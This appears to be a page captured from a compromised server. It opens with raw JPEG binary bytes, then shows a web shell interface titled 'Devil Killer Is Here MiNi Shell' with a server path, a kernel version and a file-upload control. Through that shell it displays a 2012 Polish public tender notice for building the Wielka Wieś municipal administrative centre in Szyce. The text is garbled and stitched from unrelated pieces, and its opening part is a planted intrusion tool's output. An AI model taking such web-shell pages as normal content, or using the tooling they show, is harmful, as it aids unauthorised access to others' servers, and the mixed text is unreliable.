JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121009/388762-N-2012.html

<p class="kh_header"><b>Wielka Wieś: Budowa Centrum Administracyjnego Gminy Wielka Wieś  w miejscowości Szyce Gmina Wielka Wieś</b><br>
<b>Numer ogłoszenia: 388762 - 2012; data zamieszczenia: 09.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielka Wieś , ul. Wesoła 48, 32-089 Wielka Wieś, woj. małopolskie, tel. 012 4191704, faks 012 4191705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielka-wies.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Centrum Administracyjnego Gminy Wielka Wieś  w miejscowości Szyce Gmina Wielka Wieś.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia publicznego pod nazwą Budowa Centrum Administracyjnego Gminy Wielka Wieś  w miejscowości Szyce Gmina Wielka Wieś

1.	Zaplanowana Inwestycja jest zlokalizowana na działkach 97/17, 97/18 i 97/20 w miejscowości   Szyce i obejmuje :

- budowę Centrum Administracyjnego Gminy Wielka Wieś wraz z zagospodarowaniem terenu na działkach jw.  składającego się z
budynku A  Urzędu Gminy, Rady Gminy, Urzędu Stanu Cywilnego, Straży Gminnej,
Gminnego Zakładu Komunalnego i Biblioteki Gminnej.
oraz 
budynku  B   usługowo -handlowo-biurowego z wewnętrznymi instalacjami gazowymi, wod- kan, wentylacji, elektrycznymi i teletechnicznymi.
Budynki są połączone ze sobą przewiązką.
- budowę dróg wewnętrznych i miejsc postojowych
- budowę placu wejściowego z elementami małej architektury : trzema pylonami z
  zegarem, herbem gminy i infoboxem, fontanną, ławkami
- budowę chodników
- przebudowę sieci gazowej, elektroenergetycznej i wod-kan
- budowę przyłączy wod-kan i gazu
- budowę kanalizacji deszczowej i zbiornika na wodę deszczową
- rozbiórkę dwóch budynków

2.	Stan istniejący

Działki nr 97/17, 97/18 , 97/20 o powierzchni 1,6 ha są położone bezpośrednio przy
drodze krajowej nr 94 - Kraków -Olkusz w gminie Wielka Wieś na granicy sołectwa
Szyce i Modlnica.
Teren opracowania od północy graniczy z zespołem hotelowo-restauracyjnym
zlokalizowanym na działce nr 97/19, od wschodu - z drogą krajową nr 94
przebiegającą po działce 207/2 i 85/3, od południa- z domem jednorodzinnym na
działce 34/2, a od wschodu - z polami na działce 97/13 i z działką 97/15.
Na terenie działki nr 97/18 zlokalizowany jest istniejący, funkcjonujący budynek
Ośrodka Pomocy Społecznej. Na działce 97/20 stoi parterowy budynek gospodarczy,
oraz ruina - pozostałości niewielkiego budynku murowanego - oba są przeznaczone
do rozbiórki.
Teren lekko opada w kierunku wschodnim. Różnica pomiędzy najniższą (315,20
mnpm) a najwyższą (319,20 mnpm) rzędną wynosi ok. 4 m.
Teren jest pokryty trawą oraz porośnięty drzewami i krzewami. Część z nich to
starodrzew - o obwodach pni powyżej 130 cm.
Przez działki przebiegają sieci uzbrojenia terenu, tj. napowietrzna sieć
elektroenergetyczna NN, sieć gazowa g 65, sieć wodna d 80 oraz sieć kanalizacji
sanitarnej d 300. 
3. Parametry techniczne obiektów kubaturowych 
3.1  Budynek A
- powierzchnia zabudowy                          1 149 m2
- powierzchnia dachu                                 1 269 m2
- powierzchnia całkowita nadziemia       2 360 m2
- powierzchnia całkowita poziom -1           746 m2
- powierzchni a całkowita razem              3 106 m2
- kubatura nadziemia                                  9 990 m3
- kubatura poziom -1                                   2 089 m3
- kubatura całkowita                                   12 079 m3
3.2  Budynek B
- powierzchnia zabudowy                             539 m2
- powierzchnia dachu                                     646 m2
- powierzchnia całkowita nadziemia        1 076 m2
- powierzchnia całkowita poziom -1            109 m2
- powierzchnia całkowita razem                1 185 m2
- kubatura nadziemia                                  4 551 m2
- kubatura poziom -1                                     305 m3
- kubatura całkowita                                  4 856 m3
3.3  Dane konstrukcyjno-budowlane
Budynki należy zrealizować w technologii mieszanej - fundamenty żelbetowe wylewane na mokro.  Ściany zewnętrzne nadziemia warstwowe z bloczków ceramicznych grubości 25 cm + izolacja termiczna ze styropianu samo gasnącego 12 cm + fasada z łamanego wapienia o gr. 12 cm murowanego na głęboką spoinę, w kondygnacji -1 żelbetowe z licem z cegły pełnej. Ściany wewnętrzne nadziemia bloczków ceramicznych z elementami żelbetowymi, w kondygnacji  -1 żelbetowe. Stropy i stropodachy żelbetowe wylewane na mokro jako płyta krzyżowo zbrojona .  Stropodachy niewentylowane, żelbetowe docieplane wełną mineralną + folia, wylewka spadkowa z pokryciem 2 x papa termozgrzewalna. Słupy żelbetowe, schody żelbetowe, dachy nad wejściami z drewna klejonego pokrytego szkłem bezpiecznym. Stolarka zewnętrzna - szklenie termoizolacyjne w ramach z drewna klejonego U= 1,1 W/m2K
3.4  Instalacje wewnętrzne
Budynek A należy wyposażyć w komplet instalacji:
 - centralnego ogrzewania
- wodno-kanalizacyjną
- wentylacji z elementami klimatyzacji
- gazową
- elektroenergetyczną  w tym:  zasilanie zewnętrzne podstawowe, zasilanie zewnętrzne rezerwowe, pomiar zużycia energii elektrycznej, tablic rozdzielczych piętrowych, oświetlenia podstawowego, awaryjnego i ewakuacyjnego, gniazd wtykowych, zasilania komputerów, instalacje technologiczne, instalacja oddymiania klatek schodowych, instalacja odgromowa, ochrony od przepięć, połączeń wyrównawczych, ochrony przed porażeniem 
- niskoprądową w tym:  strukturalna, SAP, antywłamaniowa, telewizji przemysłowej.
 Budynek B instalacje wewnętrzne należy wykonać:
- w zakresie instalacji elektrycznych wykonano pełny projekt wykonawczy wewnętrznych instalacji elektrycznych,  natomiast do realizacji, co znajduje odbicie w przedmiarach zmniejszono zakres przewidywanych robót w następujący sposób
a.	Rozdzielnia główna RGB , zasilanie , wlz  - dostosowane do przewidzianych obciążeń sumarycznych pięter i odbiorów technologicznych
b.	Tablice rozdzielcze piętrowe TRB-1 i TRB-2 przystosowane do przewidzianych obciążeń sumarycznych pięter
c.	Tablice rozdzielcze technologiczne - przystosowane do zaprojektowanych odbiorów technologicznych
d.	Oświetlenie ogólne
	korytarze , w.c , pom. socjalne - ujęte w projekcie
	pomieszczenia pod wynajem - ujęte oprawy oświetleniowe w projekcie  , usunięte z przedmiarów- realizować je będą Najemcy


           Obwody gniazd
	w części wspólnej tj.korytarze , w.c , pom. socjalne - ujęte w projekcie
       e.   Instalacja strukturalna
	przyjęta główna szafa dystrybucyjna i jej zasilanie 
f	Pozostałe instalacje - uziom fundamentowy, instalacja wyrównawcza, korytka kablowe, zasilanie instalacji technologicznych / winda, wentylacji i klimatyzacji, ogrzewania pomieszczeń, ogrzewania wpustów dachowych, instalacja odgromowa /- ujęte w projekcie i przeznaczone do realizacji.
             Instalacje sanitarne
W przedmiarach i w zakresie projektów  przyjęto następujący zakres wykonanych opracowań
projektowych przewidzianych do realizacji
a.	w zakresie instalacji wentylacji pozostawiono tylko wentylatory wspomagające wentylacje grawitacyjną z niezbędnymi sięgaczami  przewodów
b.	wyeliminowano centralny układ zasilania w wodę lodową  oraz układ klimakonwektorów
c.	pozostawiono sposób rozwiązania schładzania pomieszczeń indywidualnie przez potencjalnych najemców
d.	w zakresie instalacji wody zimnej ciepłej i kanalizacji sanitarnej i deszczowej przewidziano ułożenie kanalizacji podposadzkowej  pionów i całą kanalizacje deszczowa jak również rozprowadzenie przewodów wodnych do przyborów.  w sanitariatach ogólnych zabudowę przyborów. Nie ujęto  podgrzewaczy cwu pojemnościowych.
e.	w zakresie kotłowni ujęto wykonanie całej technologii kotłowni z instalacją gazową jak również instalacji spalinowo powietrznej
 w zakresie instalacji centralnego ogrzewania w projekcie ujęto wykonanie całej  instalacji co   łącznie
z grzejnikami i rozprowadzeniem przewodów.

W zakresie robót budowlano montażowych w bud. B przewiduje się wykonanie 
- całej konstrukcji budynku, wszystkich izolacji, pokryć, ścian i słupów nośnych, w tym elementów z betonu architektonicznego
- kompletnego wykończenia budynku z zewnątrz, tj. wykonania elewacji kamiennej, przeszklenia hallu, dachu wejściowego, łącznika z budynkiem A, okien i wszystkich innych elementów elewacji i dachu
- kompletnego wykończenia wewnątrz ( posadzki, ściany, sufity, balustrady) hallu, łącznika, części wspólnych (korytarzy i klatek schodowych), piwnicy, pomieszczeń sanitarnych ogólnodostępnych i pomieszczeń zapleczowo - gospodarczych w części wspólnej
- dostawa i montaż windy
Do wykonania przez Najemców przewiduje się:
- ścianki wewnętrzne z płyt gk wyznaczających podziały wewnątrz lokali oraz podziały przestrzeni wspólnej przeznaczonej pod wynajem
- posadzki i sufity pomieszczeń i przestrzeni wynajmowanych
- malowanie ścian pomieszczeń i przestrzeni wynajmowanych
4. Zagospodarowanie terenu
4.1. Komunikacja. 
Centrum  Administracyjne obsługiwane będzie przez dwa zjazdy z drogi krajowej DK 94 Kraków-Olkusz: przewidziany do przebudowy istniejący zjazd nr 1 oraz nowoprojektowany zjazd nr 2.  Jezdnia na terenie Centrum jest zaprojektowana szerokości 5 m o nawierzchni z kostki drogowej szarej prostokątnej oraz z betonu asfaltowego. Miejsca postojowe o wymiarach 2,50 x 5,00 m  w ilości 133 z kostki betonowej. Dojścia dla pieszych oraz place z kostki granitowej jasnoszarej ciętej o wymiarach 10 x 10 cm. 
4.2 Mała architektura.   
Przewiduje  się wykonanie następujących elementów zagospodarowania:
Fontanna w formie granitowych rynien z dyszami ze stali nierdzewnej posadzce placu
Zegar w formie wolnostojącego obelisku
Ławki, stojak na rowery, kosze na śmieci, plac gospodarczy z wiatą śmietnikową, oświetlenie drogowe i parkowe
4.3  Zestawienie powierzchni zagospodarowania
budynki - powierzchnia zabudowy                          2.196 m2
w tym budynek A                                                         1 149 m2
          budynek B                                                          539 m2
place i chodniki                                                            2.986 m2
drogi                                                                              2.442 m2
parkingi                                                                         1.966 m2
zieleń                                                                             6.616 m2

5. Przed przystąpieniem do robót kubaturowych wykonawca winien wykonać roboty   przygotowawcze w tym:
- wycinkę krzewów i drzew kolidujących z zaplanowanymi robotami
- wstępne ukształtowanie terenu
- przebudowę  sieci kanalizacyjnej O 300 mm na odcinku  22 mb. 
- przebudowę  sieci wodociągowej  O  160 mm na odcinku 364 mb.
- przebudowę średnioprężnej  sieci gazowe O 65 mm na DN 90 mm  odcinku  124 mb.

6 Zaplanowana inwestycja znajduje się w obszarze występowania stanowiska archeologicznego ujętego w ewidencji stanowisk Małopolskiego Wojewódzkiego Konserwatora Zabytków w Krakowie Wykonawca robót winien we własnym zakresie przeprowadzić wyprzedzające badania archeologiczne ( przed robotami zasadniczymi) na terenie przyszłej inwestycji. Koszt nadzoru archeologicznego oraz przeprowadzenie wyprzedzających badań archeologicznych należy ująć w cenie ofertowej. 

7. Do obowiązków Wykonawcy należy uzyskanie prawomocnej decyzji pozwolenia na użytkowanie dla budynku A wraz z zagospodarowaniem terenu 

8.Szczegółowy zakres robót jaki pozostaje do wykonania w ramach niniejszego zamówienia określa projekt budowlany i projekty wykonawcze, specyfikacja techniczna oraz  przedmiary robót wszystkich branż, które jednak należy traktować wyłącznie jako materiały pomocnicze do określenia przedmiotu zamówienia. Przedmiary te nie mogą  stanowić  podstawy do wyceny, bowiem każdy z oferentów jest zobowiązany do dokładnego zapoznania się z projektami oraz innymi  uwarunkowaniami  i na podstawie tak uzyskanej wiedzy opracować własny przedmiar stanowiący podstawę do sporządzenia kosztorysu ofertowego. 

8.W cenie ryczałtowej należy uwzględnić wszelkie roboty i czynności nie objęte zakresem przedmiotowym zamówienia i nie ujęte w przedmiarach robót, a których konieczność wykonania wyniknęła z dokumentacji, a bez których pełne zrealizowanie zakresu przedmiotowego zamówienia stałoby się niemożliwe lub znacznie utrudnione. 

9.Podstawą sporządzenia kosztorysu ofertowego są w równej mierze opis techniczny dokumentacji wszystkich branż, rysunki dokumentacji wszystkich branż, specyfikacje techniczne, SIWZ, wiedza zawodowa wykonawcy oraz obowiązujące normy i przepisy.

10.Zamawiający dopuszcza zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej pod warunkiem, że użyte przez wykonawcę materiały będą odpowiadać normom jakościowym wymaganym przez odpowiednie w tym względzie przepisy oraz zapewniać standard narzucony w dokumentacji. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów uwiarygodniających te materiały i urządzenia.

11.Wytyczne do sporządzenia kosztorysu ofertowego:
-	realizacja robót odbywać się będzie wyłącznie z materiałów dostarczanych przez wykonawcę.
-	Integralną częścią  Specyfikacji Istotnych Warunków Zamówienia  jest część opisowa do projektu wykonawczego składająca się z opisu technicznego, warunków technicznych wykonania i odbioru robot budowlanych.
-	Prace budowlane należy prowadzić zgodnie z warunkami technicznymi wykonania i odbioru robót budowlano-montażowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.00-2, 45.11.23.00-8, 45.11.30.00-2, 45.20.00.00-9, 45.10.00.00-8, 45.11.00.00-1, 45.11.10.00-8, 45.20.00.00-9, 45.21.00.00-2, 45.21.13.50-7, 45.21.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wadium w kwocie 200 tys. zł ( dwieście tysięcy złotych )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 2 roboty budowlane odpowiadające swoim rodzajem  robotom stanowiącym przedmiot zamówienia o wartości ogólnej co najmniej 10 mln złotych każda .Inwestycje powinny być zrealizowane kompleksowo na zasadzie generalnego wykonawstwa. Udział procentowy poszczególnych branż w każdej ze zrealizowanej inwestycji winien kształtować się w granicach:
- roboty ogólnobudowlane - ok. 70% ? 10%
- instalacje sanitarne - ok. 15% ? 5%
- instalacje elektryczne - ok. 15% ? 5%
Za roboty tego samego rodzaju Zamawiający uzna roboty polegające na budowie obiektów kubaturowych wykonanych w technologii tradycyjnej  o kubaturze nie mniejszej niż 10.000,00 m 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże dysponowanie minimum:
- 1 kierownikiem robót  posiadającym uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń
-1 kierownikiem robót posiadającym uprawnienia do kierowania robotami w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.
-1 kierownikiem robót  posiadającym uprawnienia do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń.
- 1 kierownikiem robót posiadającym uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3/ sytuacji finansowej: Warunek ten zostanie spełniony jeżeli Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże ,że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 4.000.000,00 zł- ( słownie: cztery miliony złotych )

4/sytuacji ekonomicznej: Warunek ten zostanie spełniony jeżeli Wykonawca wykaż że posiada opłaconą  polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 2.000.000,00 złotych ( dwa miliony złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

